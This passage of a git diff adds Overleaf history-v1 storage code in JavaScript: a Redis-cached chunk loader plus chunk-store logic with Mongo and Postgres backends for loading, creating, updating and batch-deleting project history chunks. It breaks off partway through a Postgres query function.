projectId + * @return {Promise.<Chunk>} + */ +async function loadLatest(projectId) { + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + const chunkRecord = await chunkStore.loadLatestRaw(projectId) + const cachedChunkIsValid = redisBackend.checkCacheValidityWithMetadata( + cachedChunk, + chunkRecord + ) + if (cachedChunkIsValid) { + metrics.inc('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + return cachedChunk + } else { + metrics.inc('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + const chunk = await chunkStore.loadLatest(projectId) + await redisBackend.setCurrentChunk(projectId, chunk) + return chunk + } +} + +module.exports = { + loadLatest, +} diff --git a/services/history-v1/storage/lib/chunk_store/errors.js b/services/history-v1/storage/lib/chunk_store/errors.js new file mode 100644 index 0000000..5f0eba6 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/errors.js @@ -0,0 +1,7 @@ +const OError = require('@overleaf/o-error') + +class ChunkVersionConflictError extends OError {} + +module.exports = { + ChunkVersionConflictError, +} diff --git a/services/history-v1/storage/lib/chunk_store/index.js b/services/history-v1/storage/lib/chunk_store/index.js new file mode 100644 index 0000000..f75c017 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/index.js @@ -0,0 +1,447 @@ +// @ts-check + +'use strict' + +/** + * Manage {@link Chunk} and {@link History} storage. + * + * For storage, chunks are immutable. If we want to update a project with new + * changes, we create a new chunk record and History object and delete the old + * ones. If we compact a project's history, we similarly destroy the old chunk + * (or chunks) and replace them with a new one. 
This is helpful when using S3, + * because it guarantees only eventual consistency for updates but provides + * stronger consistency guarantees for object creation. + * + * When a chunk record in the database is removed, we save its ID for later + * in the `old_chunks` table, rather than deleting it immediately. This lets us + * use batch deletion to reduce the number of delete requests to S3. + * + * The chunk store also caches data about which blobs are referenced by each + * chunk, which allows us to find unused blobs without loading all of the data + * for all projects from S3. Whenever we create a chunk, we also insert records + * into the `chunk_blobs` table, to help with this bookkeeping. + */ + +const config = require('config') +const OError = require('@overleaf/o-error') +const { Chunk, History, Snapshot } = require('overleaf-editor-core') + +const assert = require('../assert') +const BatchBlobStore = require('../batch_blob_store') +const { BlobStore } = require('../blob_store') +const { historyStore } = require('../history_store') +const mongoBackend = require('./mongo') +const postgresBackend = require('./postgres') +const { ChunkVersionConflictError } = require('./errors') + +const DEFAULT_DELETE_BATCH_SIZE = parseInt(config.get('maxDeleteKeys'), 10) +const DEFAULT_DELETE_TIMEOUT_SECS = 3000 // 50 minutes +const DEFAULT_DELETE_MIN_AGE_SECS = 86400 // 1 day + +/** + * Create the initial chunk for a project. + */ +async function initializeProject(projectId, snapshot) { + if (projectId != null) { + assert.projectId(projectId, 'bad projectId') + } else { + projectId = await postgresBackend.generateProjectId() + } + + if (snapshot != null) { + assert.instance(snapshot, Snapshot, 'bad snapshot') + } else { + snapshot = new Snapshot() + } + + const blobStore = new BlobStore(projectId) + await blobStore.initialize() + + const backend = getBackend(projectId) + const chunkRecord = await backend.getLatestChunk(projectId) + if (chunkRecord != null) { + throw new AlreadyInitialized(projectId) + } + + const history = new History(snapshot, []) + const chunk = new Chunk(history, 0) + await create(projectId, chunk) + return projectId +} + +/** + * Load the blobs referenced in the given history + */ +async function lazyLoadHistoryFiles(history, batchBlobStore) { + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + + await batchBlobStore.preload(Array.from(blobHashes)) + await history.loadFiles('lazy', batchBlobStore) +} + +/** + * Load the latest Chunk stored for a project, including blob metadata. + * + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + * @return {Promise<{id: string, startVersion: number, endVersion: number, endTimestamp: Date}>} + */ +async function loadLatestRaw(projectId, opts) { + assert.projectId(projectId, 'bad projectId') + + const backend = getBackend(projectId) + const chunkRecord = await backend.getLatestChunk(projectId, opts) + if (chunkRecord == null) { + throw new Chunk.NotFoundError(projectId) + } + return chunkRecord +} + +/** + * Load the latest Chunk stored for a project, including blob metadata. 
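+ * Unlike loadLatestRaw, this inflates the chunk fully: it fetches the raw
+ * history from the history store, rebuilds the History object, and preloads
+ * blob metadata for the files it references.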
+ *
+ * @param {string} projectId
+ * @return {Promise.<Chunk>}
+ */
+async function loadLatest(projectId) {
+  const chunkRecord = await loadLatestRaw(projectId)
+  const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id)
+  const history = History.fromRaw(rawHistory)
+  const blobStore = new BlobStore(projectId)
+  const batchBlobStore = new BatchBlobStore(blobStore)
+  await lazyLoadHistoryFiles(history, batchBlobStore)
+  return new Chunk(history, chunkRecord.startVersion)
+}
+
+/**
+ * Load the chunk that contains the given version, including blob metadata.
+ */
+async function loadAtVersion(projectId, version) {
+  assert.projectId(projectId, 'bad projectId')
+  assert.integer(version, 'bad version')
+
+  const backend = getBackend(projectId)
+  const blobStore = new BlobStore(projectId)
+  const batchBlobStore = new BatchBlobStore(blobStore)
+
+  const chunkRecord = await backend.getChunkForVersion(projectId, version)
+  const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id)
+  const history = History.fromRaw(rawHistory)
+  await lazyLoadHistoryFiles(history, batchBlobStore)
+  return new Chunk(history, chunkRecord.endVersion - history.countChanges())
+}
+
+/**
+ * Load the chunk that contains the version that was current at the given
+ * timestamp, including blob metadata.
+ */
+async function loadAtTimestamp(projectId, timestamp) {
+  assert.projectId(projectId, 'bad projectId')
+  assert.date(timestamp, 'bad timestamp')
+
+  const backend = getBackend(projectId)
+  const blobStore = new BlobStore(projectId)
+  const batchBlobStore = new BatchBlobStore(blobStore)
+
+  const chunkRecord = await backend.getChunkForTimestamp(projectId, timestamp)
+  const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id)
+  const history = History.fromRaw(rawHistory)
+  await lazyLoadHistoryFiles(history, batchBlobStore)
+  return new Chunk(history, chunkRecord.endVersion - history.countChanges())
+}
+
+/**
+ * Store the chunk and insert corresponding records in the database.
+ *
+ * @param {string} projectId
+ * @param {Chunk} chunk
+ * @param {Date} [earliestChangeTimestamp]
+ */
+async function create(projectId, chunk, earliestChangeTimestamp) {
+  assert.projectId(projectId, 'bad projectId')
+  assert.instance(chunk, Chunk, 'bad chunk')
+  assert.maybe.date(earliestChangeTimestamp, 'bad timestamp')
+
+  const backend = getBackend(projectId)
+  const chunkStart = chunk.getStartVersion()
+  const chunkId = await uploadChunk(projectId, chunk)
+
+  const opts = {}
+  if (chunkStart > 0) {
+    opts.oldChunkId = await getChunkIdForVersion(projectId, chunkStart - 1)
+  }
+  if (earliestChangeTimestamp != null) {
+    opts.earliestChangeTimestamp = earliestChangeTimestamp
+  }
+
+  await backend.confirmCreate(projectId, chunk, chunkId, opts)
+}
+
+/**
+ * Upload the given chunk to object storage.
+ *
+ * This is used by the create and update methods.
+ */
+async function uploadChunk(projectId, chunk) {
+  const backend = getBackend(projectId)
+  const blobStore = new BlobStore(projectId)
+
+  const historyStoreConcurrency = parseInt(
+    config.get('chunkStore.historyStoreConcurrency'),
+    10
+  )
+
+  const rawHistory = await chunk
+    .getHistory()
+    .store(blobStore, historyStoreConcurrency)
+  const chunkId = await backend.insertPendingChunk(projectId, chunk)
+  await historyStore.storeRaw(projectId, chunkId, rawHistory)
+  return chunkId
+}
+
+/**
+ * Extend the project's history by replacing the latest chunk with a new
+ * chunk.
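+ * The swap is guarded by the backend: confirmUpdate refuses to replace a
+ * chunk that was closed or changed concurrently and raises
+ * ChunkVersionConflictError instead.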
+ *
+ * @param {string} projectId
+ * @param {number} oldEndVersion
+ * @param {Chunk} newChunk
+ * @param {Date} [earliestChangeTimestamp]
+ * @return {Promise}
+ */
+async function update(
+  projectId,
+  oldEndVersion,
+  newChunk,
+  earliestChangeTimestamp
+) {
+  assert.projectId(projectId, 'bad projectId')
+  assert.integer(oldEndVersion, 'bad oldEndVersion')
+  assert.instance(newChunk, Chunk, 'bad newChunk')
+  assert.maybe.date(earliestChangeTimestamp, 'bad timestamp')
+
+  const backend = getBackend(projectId)
+  const oldChunkId = await getChunkIdForVersion(projectId, oldEndVersion)
+  const newChunkId = await uploadChunk(projectId, newChunk)
+
+  const opts = {}
+  if (earliestChangeTimestamp != null) {
+    opts.earliestChangeTimestamp = earliestChangeTimestamp
+  }
+
+  await backend.confirmUpdate(projectId, oldChunkId, newChunk, newChunkId, opts)
+}
+
+/**
+ * Find the chunk ID for a given version of a project.
+ *
+ * @param {string} projectId
+ * @param {number} version
+ * @return {Promise.<string>}
+ */
+async function getChunkIdForVersion(projectId, version) {
+  const backend = getBackend(projectId)
+  const chunkRecord = await backend.getChunkForVersion(projectId, version)
+  return chunkRecord.id
+}
+
+/**
+ * Find the chunk metadata for a given version of a project.
+ *
+ * @param {string} projectId
+ * @param {number} version
+ * @return {Promise.<{id: string|number, startVersion: number, endVersion: number}>}
+ */
+async function getChunkMetadataForVersion(projectId, version) {
+  const backend = getBackend(projectId)
+  const chunkRecord = await backend.getChunkForVersion(projectId, version)
+  return chunkRecord
+}
+
+/**
+ * Get all of a project's chunk ids
+ */
+async function getProjectChunkIds(projectId) {
+  const backend = getBackend(projectId)
+  const chunkIds = await backend.getProjectChunkIds(projectId)
+  return chunkIds
+}
+
+/**
+ * Get all of a project's chunks directly
+ */
+async function getProjectChunks(projectId) {
+  const backend = getBackend(projectId)
+  const chunks = await backend.getProjectChunks(projectId)
+  return chunks
+}
+
+/**
+ * Load the chunk for a given chunk record, including blob metadata.
+ */
+async function loadByChunkRecord(projectId, chunkRecord) {
+  const blobStore = new BlobStore(projectId)
+  const batchBlobStore = new BatchBlobStore(blobStore)
+  const { raw: rawHistory, buffer: chunkBuffer } =
+    await historyStore.loadRawWithBuffer(projectId, chunkRecord.id)
+  const history = History.fromRaw(rawHistory)
+  await lazyLoadHistoryFiles(history, batchBlobStore)
+  return {
+    chunk: new Chunk(history, chunkRecord.endVersion - history.countChanges()),
+    chunkBuffer,
+  }
+}
+
+/**
+ * Asynchronously retrieves project chunks starting from a specific version.
+ *
+ * This generator function yields chunk records for a given project starting from the specified version (inclusive).
+ * It continues to fetch and yield subsequent chunk records until the end version of the latest chunk metadata is reached.
+ * If you want to fetch all the chunks *after* a version V, call this function with V+1.
+ *
+ * @param {string} projectId - The ID of the project.
+ * @param {number} version - The starting version to retrieve chunks from.
+ * @returns {AsyncGenerator<Object, void, undefined>} An async generator that yields chunk records.
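+ *
+ * @example
+ * // Hypothetical usage: stream every chunk from version 42 onwards,
+ * // i.e. all chunks *after* version 41.
+ * for await (const chunkRecord of getProjectChunksFromVersion(projectId, 42)) {
+ *   console.log(chunkRecord.startVersion, chunkRecord.endVersion)
+ * }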
+ */ +async function* getProjectChunksFromVersion(projectId, version) { + const backend = getBackend(projectId) + const latestChunkMetadata = await loadLatestRaw(projectId) + if (!latestChunkMetadata || version > latestChunkMetadata.endVersion) { + return + } + let chunkRecord = await backend.getChunkForVersion(projectId, version) + while (chunkRecord != null) { + yield chunkRecord + if (chunkRecord.endVersion >= latestChunkMetadata.endVersion) { + break + } else { + chunkRecord = await backend.getChunkForVersion( + projectId, + chunkRecord.endVersion + 1 + ) + } + } +} + +/** + * Delete the given chunk from the database. + * + * This doesn't delete the chunk from object storage yet. The old chunks + * collection will do that. + */ +async function destroy(projectId, chunkId) { + const backend = getBackend(projectId) + await backend.deleteChunk(projectId, chunkId) +} + +/** + * Delete all of a project's chunks from the database. + */ +async function deleteProjectChunks(projectId) { + const backend = getBackend(projectId) + await backend.deleteProjectChunks(projectId) +} + +/** + * Delete a given number of old chunks from both the database + * and from object storage. + * + * @param {object} options + * @param {number} [options.batchSize] - number of chunks to delete in each + * batch + * @param {number} [options.maxBatches] - maximum number of batches to process + * @param {number} [options.minAgeSecs] - minimum age of chunks to delete + * @param {number} [options.timeout] - maximum time to spend deleting chunks + * + * @return {Promise<number>} number of chunks deleted + */ +async function deleteOldChunks(options = {}) { + const batchSize = options.batchSize ?? DEFAULT_DELETE_BATCH_SIZE + const maxBatches = options.maxBatches ?? Number.MAX_SAFE_INTEGER + const minAgeSecs = options.minAgeSecs ?? DEFAULT_DELETE_MIN_AGE_SECS + const timeout = options.timeout ?? DEFAULT_DELETE_TIMEOUT_SECS + assert.greater(batchSize, 0) + assert.greater(timeout, 0) + assert.greater(maxBatches, 0) + assert.greaterOrEqual(minAgeSecs, 0) + + const timeoutAfter = Date.now() + timeout * 1000 + let deletedChunksTotal = 0 + for (const backend of [postgresBackend, mongoBackend]) { + for (let i = 0; i < maxBatches; i++) { + if (Date.now() > timeoutAfter) { + break + } + const deletedChunks = await deleteOldChunksBatch( + backend, + batchSize, + minAgeSecs + ) + deletedChunksTotal += deletedChunks.length + if (deletedChunks.length !== batchSize) { + // Last batch was incomplete. There probably are no old chunks left + break + } + } + } + return deletedChunksTotal +} + +async function deleteOldChunksBatch(backend, count, minAgeSecs) { + assert.greater(count, 0, 'bad count') + assert.greaterOrEqual(minAgeSecs, 0, 'bad minAgeSecs') + + const oldChunks = await backend.getOldChunksBatch(count, minAgeSecs) + if (oldChunks.length === 0) { + return [] + } + await historyStore.deleteChunks(oldChunks) + await backend.deleteOldChunks(oldChunks.map(chunk => chunk.chunkId)) + return oldChunks +} + +/** + * Returns the appropriate backend for the given project id + * + * Numeric ids use the Postgres backend. + * Strings of 24 characters use the Mongo backend. 
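+ *
+ * @example
+ * // illustrative ids only
+ * getBackend('1234') // => postgresBackend
+ * getBackend('507f1f77bcf86cd799439011') // => mongoBackend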
+ */ +function getBackend(projectId) { + if (assert.POSTGRES_ID_REGEXP.test(projectId)) { + return postgresBackend + } else if (assert.MONGO_ID_REGEXP.test(projectId)) { + return mongoBackend + } else { + throw new OError('bad project id', { projectId }) + } +} + +class AlreadyInitialized extends OError { + constructor(projectId) { + super('Project is already initialized', { projectId }) + } +} + +module.exports = { + getBackend, + initializeProject, + loadLatest, + loadLatestRaw, + loadAtVersion, + loadAtTimestamp, + loadByChunkRecord, + create, + update, + destroy, + getChunkIdForVersion, + getChunkMetadataForVersion, + getProjectChunkIds, + getProjectChunks, + getProjectChunksFromVersion, + deleteProjectChunks, + deleteOldChunks, + AlreadyInitialized, + ChunkVersionConflictError, +} diff --git a/services/history-v1/storage/lib/chunk_store/mongo.js b/services/history-v1/storage/lib/chunk_store/mongo.js new file mode 100644 index 0000000..a34b719 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/mongo.js @@ -0,0 +1,526 @@ +// @ts-check + +const { ObjectId, ReadPreference, MongoError } = require('mongodb') +const { Chunk } = require('overleaf-editor-core') +const OError = require('@overleaf/o-error') +const assert = require('../assert') +const mongodb = require('../mongodb') +const { ChunkVersionConflictError } = require('./errors') + +const DUPLICATE_KEY_ERROR_CODE = 11000 + +/** + * @import { ClientSession } from 'mongodb' + */ + +/** + * Get the latest chunk's metadata from the database + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + */ +async function getLatestChunk(projectId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + const { readOnly = false } = opts + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { + sort: { startVersion: -1 }, + readPreference: readOnly + ? ReadPreference.secondaryPreferred + : ReadPreference.primary, + } + ) + if (record == null) { + return null + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + */ +async function getChunkForVersion(projectId, version) { + assert.mongoId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + startVersion: { $lte: version }, + endVersion: { $gte: version }, + }, + { sort: { startVersion: 1 } } + ) + if (record == null) { + throw new Chunk.VersionNotFoundError(projectId, version) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version before the endTime. 
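+ *
+ * Looks for the first chunk (the one that starts at version 0): the active
+ * copy is preferred, with a fallback to deleted chunks via the updatedAt
+ * index for state=deleted.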
+ */
+async function getFirstChunkBeforeTimestamp(projectId, timestamp) {
+  assert.mongoId(projectId, 'bad projectId')
+  assert.date(timestamp, 'bad timestamp')
+
+  const recordActive = await getChunkForVersion(projectId, 0)
+  if (recordActive && recordActive.endTimestamp <= timestamp) {
+    return recordActive
+  }
+
+  // fallback to deleted chunk
+  const recordDeleted = await mongodb.chunks.findOne(
+    {
+      projectId: new ObjectId(projectId),
+      state: 'deleted',
+      startVersion: 0,
+      updatedAt: { $lte: timestamp }, // indexed for state=deleted
+      endTimestamp: { $lte: timestamp },
+    },
+    { sort: { updatedAt: -1 } }
+  )
+  if (recordDeleted) {
+    return chunkFromRecord(recordDeleted)
+  }
+  throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp)
+}
+
+/**
+ * Get the metadata for the chunk that contains the version that was current at
+ * the given timestamp.
+ */
+async function getChunkForTimestamp(projectId, timestamp) {
+  assert.mongoId(projectId, 'bad projectId')
+  assert.date(timestamp, 'bad timestamp')
+
+  const record = await mongodb.chunks.findOne(
+    {
+      projectId: new ObjectId(projectId),
+      state: { $in: ['active', 'closed'] },
+      endTimestamp: { $gte: timestamp },
+    },
+    // We use the index on the startVersion for sorting records. This assumes
+    // that timestamps go up with each version.
+    { sort: { startVersion: 1 } }
+  )
+
+  if (record == null) {
+    // Couldn't find a chunk that had modifications after the given timestamp.
+    // Fetch the latest chunk instead.
+    const chunk = await getLatestChunk(projectId)
+    if (chunk == null) {
+      throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp)
+    }
+    return chunk
+  }
+
+  return chunkFromRecord(record)
+}
+
+/**
+ * Get the metadata for the chunk that contains the version that was current before
+ * the given timestamp.
+ */
+async function getLastActiveChunkBeforeTimestamp(projectId, timestamp) {
+  assert.mongoId(projectId, 'bad projectId')
+  assert.date(timestamp, 'bad timestamp')
+
+  const record = await mongodb.chunks.findOne(
+    {
+      projectId: new ObjectId(projectId),
+      state: { $in: ['active', 'closed'] },
+      $or: [
+        {
+          endTimestamp: {
+            $lte: timestamp,
+          },
+        },
+        {
+          endTimestamp: null,
+        },
+      ],
+    },
+    // We use the index on the startVersion for sorting records. This assumes
+    // that timestamps go up with each version.
+    { sort: { startVersion: -1 } }
+  )
+  if (record == null) {
+    throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp)
+  }
+  return chunkFromRecord(record)
+}
+
+/**
+ * Get all of a project's chunk ids
+ */
+async function getProjectChunkIds(projectId) {
+  assert.mongoId(projectId, 'bad projectId')
+
+  const cursor = mongodb.chunks.find(
+    {
+      projectId: new ObjectId(projectId),
+      state: { $in: ['active', 'closed'] },
+    },
+    { projection: { _id: 1 } }
+  )
+  return await cursor.map(record => record._id).toArray()
+}
+
+/**
+ * Get all of a project's chunks directly
+ */
+async function getProjectChunks(projectId) {
+  assert.mongoId(projectId, 'bad projectId')
+
+  const cursor = mongodb.chunks
+    .find(
+      {
+        projectId: new ObjectId(projectId),
+        state: { $in: ['active', 'closed'] },
+      },
+      { projection: { state: 0 } }
+    )
+    .sort({ startVersion: 1 })
+  return await cursor.map(chunkFromRecord).toArray()
+}
+
+/**
+ * Insert a pending chunk before sending it to object storage.
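+ *
+ * The chunk is written in state 'pending' and stays invisible to readers
+ * until confirmCreate or confirmUpdate flips it to 'active'.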
+ */ +async function insertPendingChunk(projectId, chunk) { + assert.mongoId(projectId, 'bad projectId') + assert.instance(chunk, Chunk, 'bad chunk') + + const chunkId = new ObjectId() + await mongodb.chunks.insertOne({ + _id: chunkId, + projectId: new ObjectId(projectId), + startVersion: chunk.getStartVersion(), + endVersion: chunk.getEndVersion(), + endTimestamp: chunk.getEndTimestamp(), + state: 'pending', + updatedAt: new Date(), + }) + return chunkId.toString() +} + +/** + * Record that a new chunk was created. + * + * @param {string} projectId + * @param {Chunk} chunk + * @param {string} chunkId + * @param {object} opts + * @param {Date} [opts.earliestChangeTimestamp] + * @param {string} [opts.oldChunkId] + */ +async function confirmCreate(projectId, chunk, chunkId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.instance(chunk, Chunk, 'bad newChunk') + assert.mongoId(chunkId, 'bad newChunkId') + + await mongodb.client.withSession(async session => { + await session.withTransaction(async () => { + if (opts.oldChunkId != null) { + await closeChunk(projectId, opts.oldChunkId, { session }) + } + + await activateChunk(projectId, chunkId, { session }) + + await updateProjectRecord( + projectId, + chunk, + opts.earliestChangeTimestamp, + { session } + ) + }) + }) +} + +/** + * Write the metadata to the project record + */ +async function updateProjectRecord( + projectId, + chunk, + earliestChangeTimestamp, + mongoOpts = {} +) { + // record the end version against the project + await mongodb.projects.updateOne( + { + 'overleaf.history.id': projectId, // string for Object ids, number for postgres ids + }, + { + // always store the latest end version and timestamp for the chunk + $max: { + 'overleaf.history.currentEndVersion': chunk.getEndVersion(), + 'overleaf.history.currentEndTimestamp': chunk.getEndTimestamp(), + 'overleaf.history.updatedAt': new Date(), + }, + // store the first pending change timestamp for the chunk, this will + // be cleared every time a backup is completed. + $min: { + 'overleaf.backup.pendingChangeAt': + earliestChangeTimestamp || chunk.getEndTimestamp() || new Date(), + }, + }, + mongoOpts + ) +} + +/** + * Record that a chunk was replaced by a new one. 
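+ * The old chunk is marked deleted and the new pending chunk is activated in
+ * a single Mongo transaction, so readers never observe both chunks at once.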
+ * + * @param {string} projectId + * @param {string} oldChunkId + * @param {Chunk} newChunk + * @param {string} newChunkId + * @param {object} [opts] + * @param {Date} [opts.earliestChangeTimestamp] + */ +async function confirmUpdate( + projectId, + oldChunkId, + newChunk, + newChunkId, + opts = {} +) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(oldChunkId, 'bad oldChunkId') + assert.instance(newChunk, Chunk, 'bad newChunk') + assert.mongoId(newChunkId, 'bad newChunkId') + + await mongodb.client.withSession(async session => { + await session.withTransaction(async () => { + await deleteActiveChunk(projectId, oldChunkId, { session }) + + await activateChunk(projectId, newChunkId, { session }) + + await updateProjectRecord( + projectId, + newChunk, + opts.earliestChangeTimestamp, + { session } + ) + }) + }) +} + +/** + * Activate a pending chunk + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function activateChunk(projectId, chunkId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(chunkId, 'bad chunkId') + + let result + try { + result = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'pending', + }, + { $set: { state: 'active', updatedAt: new Date() } }, + opts + ) + } catch (err) { + if (err instanceof MongoError && err.code === DUPLICATE_KEY_ERROR_CODE) { + throw new ChunkVersionConflictError('chunk start version is not unique', { + projectId, + chunkId, + }) + } else { + throw err + } + } + if (result.matchedCount === 0) { + throw new OError('pending chunk not found', { projectId, chunkId }) + } +} + +/** + * Close a chunk + * + * A closed chunk is one that can't be extended anymore. + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function closeChunk(projectId, chunkId, opts = {}) { + const result = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'active', + }, + { $set: { state: 'closed' } }, + opts + ) + + if (result.matchedCount === 0) { + throw new ChunkVersionConflictError('unable to close chunk', { + projectId, + chunkId, + }) + } +} + +/** + * Delete an active chunk + * + * This is used to delete chunks that are in the process of being extended. It + * will refuse to delete chunks that are already closed and can therefore not be + * extended. + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function deleteActiveChunk(projectId, chunkId, opts = {}) { + const updateResult = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'active', + }, + { $set: { state: 'deleted', updatedAt: new Date() } }, + opts + ) + + if (updateResult.matchedCount === 0) { + throw new ChunkVersionConflictError('unable to delete active chunk', { + projectId, + chunkId, + }) + } +} + +/** + * Delete a chunk. 
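+ * This is a soft delete: the record is only flagged as 'deleted' here, and
+ * getOldChunksBatch/deleteOldChunks reap it from the database later.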
+ * + * @param {string} projectId + * @param {string} chunkId + * @return {Promise} + */ +async function deleteChunk(projectId, chunkId, mongoOpts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(chunkId, 'bad chunkId') + + await mongodb.chunks.updateOne( + { _id: new ObjectId(chunkId), projectId: new ObjectId(projectId) }, + { $set: { state: 'deleted', updatedAt: new Date() } }, + mongoOpts + ) +} + +/** + * Delete all of a project's chunks + */ +async function deleteProjectChunks(projectId) { + assert.mongoId(projectId, 'bad projectId') + + await mongodb.chunks.updateMany( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { $set: { state: 'deleted', updatedAt: new Date() } } + ) +} + +/** + * Get a batch of old chunks for deletion + */ +async function getOldChunksBatch(count, minAgeSecs) { + const maxUpdatedAt = new Date(Date.now() - minAgeSecs * 1000) + const batch = [] + + // We need to fetch one state at a time to take advantage of the partial + // indexes on the chunks collection. + // + // Mongo 6.0 allows partial indexes that use the $in operator. When we reach + // that Mongo version, we can create a partial index on both the deleted and + // pending states and simplify this logic a bit. + for (const state of ['deleted', 'pending']) { + if (count === 0) { + // There's no more space in the batch + break + } + + const cursor = mongodb.chunks + .find( + { state, updatedAt: { $lt: maxUpdatedAt } }, + { + limit: count, + projection: { _id: 1, projectId: 1 }, + } + ) + .map(record => ({ + chunkId: record._id.toString(), + projectId: record.projectId.toString(), + })) + + for await (const record of cursor) { + batch.push(record) + count -= 1 + } + } + return batch +} + +/** + * Delete a batch of old chunks from the database + */ +async function deleteOldChunks(chunkIds) { + await mongodb.chunks.deleteMany({ + _id: { $in: chunkIds.map(id => new ObjectId(id)) }, + state: { $in: ['deleted', 'pending'] }, + }) +} + +/** + * Build a chunk metadata object from the database record + */ +function chunkFromRecord(record) { + return { + id: record._id.toString(), + startVersion: record.startVersion, + endVersion: record.endVersion, + endTimestamp: record.endTimestamp, + } +} + +module.exports = { + getLatestChunk, + getFirstChunkBeforeTimestamp, + getLastActiveChunkBeforeTimestamp, + getChunkForVersion, + getChunkForTimestamp, + getProjectChunkIds, + getProjectChunks, + insertPendingChunk, + confirmCreate, + confirmUpdate, + updateProjectRecord, + deleteChunk, + deleteProjectChunks, + getOldChunksBatch, + deleteOldChunks, +} diff --git a/services/history-v1/storage/lib/chunk_store/postgres.js b/services/history-v1/storage/lib/chunk_store/postgres.js new file mode 100644 index 0000000..0c33c0f --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/postgres.js @@ -0,0 +1,487 @@ +// @ts-check + +const { Chunk } = require('overleaf-editor-core') +const assert = require('../assert') +const knex = require('../knex') +const knexReadOnly = require('../knex_read_only') +const { ChunkVersionConflictError } = require('./errors') +const { updateProjectRecord } = require('./mongo') + +const DUPLICATE_KEY_ERROR_CODE = '23505' + +/** + * @import { Knex } from 'knex' + */ + +/** + * Get the latest chunk's metadata from the database + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + */ +async function getLatestChunk(projectId, opts = {}) { + assert.postgresId(projectId, 'bad projectId') + const { 
readOnly = false } = opts + + const record = await (readOnly ? knexReadOnly : knex)('chunks') + .where('doc_id', parseInt(projectId, 10)) + .orderBy('end_version', 'desc') + .first() + if (record == null) { + return null + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + * + * @param {string} projectId + * @param {number} version + */ +async function getChunkForVersion(projectId, version) { + assert.postgresId(projectId, 'bad projectId') + + const record = await knex('chunks') + .where('doc_id', parseInt(projectId, 10)) + .where('end_version', '>=', version) + .orderBy('end_version') + .first() + if (!record) { + throw new Chunk.VersionNotFoundError(projectId, version) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getFirstChunkBeforeTimestamp(projectId, timestamp) { + assert.date(timestamp, 'bad timestamp') + + const recordActive = await getChunkForVersion(projectId, 0) + + // projectId must be valid if getChunkForVersion did not throw + if (recordActive && recordActive.endTimestamp <= timestamp) { + return recordActive + } + + // fallback to deleted chunk + const recordDeleted = await knex('old_chunks') + .where('doc_id', parseInt(projectId, 10)) + .where('start_version', '=', 0) + .where('end_timestamp', '<=', timestamp) + .orderBy('end_version', 'desc') + .first() + if (recordDeleted) { + return chunkFromRecord(recordDeleted) + } + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) +} + +/** + * Get the metadata for the chunk that contains the version that was current at + * the given timestamp. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getLastActiveChunkBeforeTimestamp(projectId, timestamp) { + assert.date(timestamp, 'bad timestamp') + assert.postgresId(projectId, 'bad projectId') + + const query = knex('chunks') + .where('doc_id', parseInt(projectId, 10)) + .where(function () { + this.where('end_timestamp', '<=', timestamp).orWhere( + 'end_timestamp', + null + ) + }) + .orderBy('end_version', 'desc', 'last') + + const record = await query.first() + + if (!record) { + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the version that was current at + * the given timestamp. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getChunkForTimestamp(projectId, timestamp) { + assert.postgresId(projectId, 'bad projectId') + + // This query will find the latest chunk after the timestamp (query orders + // in reverse chronological order), OR the latest chunk + // This accounts for the case where the timestamp is ahead of the chunk's + // timestamp and therefore will not return any results + const whereAfterEndTimestampOrLatestChunk = knex.raw( + 'end_timestamp >= ? ' + + 'OR id = ( ' + + 'SELECT id FROM chunks ' + + 'WHERE doc_id = ? 
' +
+      'ORDER BY end_version desc LIMIT 1' +
+      ')',
+    [timestamp, parseInt(projectId, 10)]
+  )
+
+  const record = await knex('chunks')
+    .where('doc_id', parseInt(projectId, 10))
+    .where(whereAfterEndTimestampOrLatestChunk)
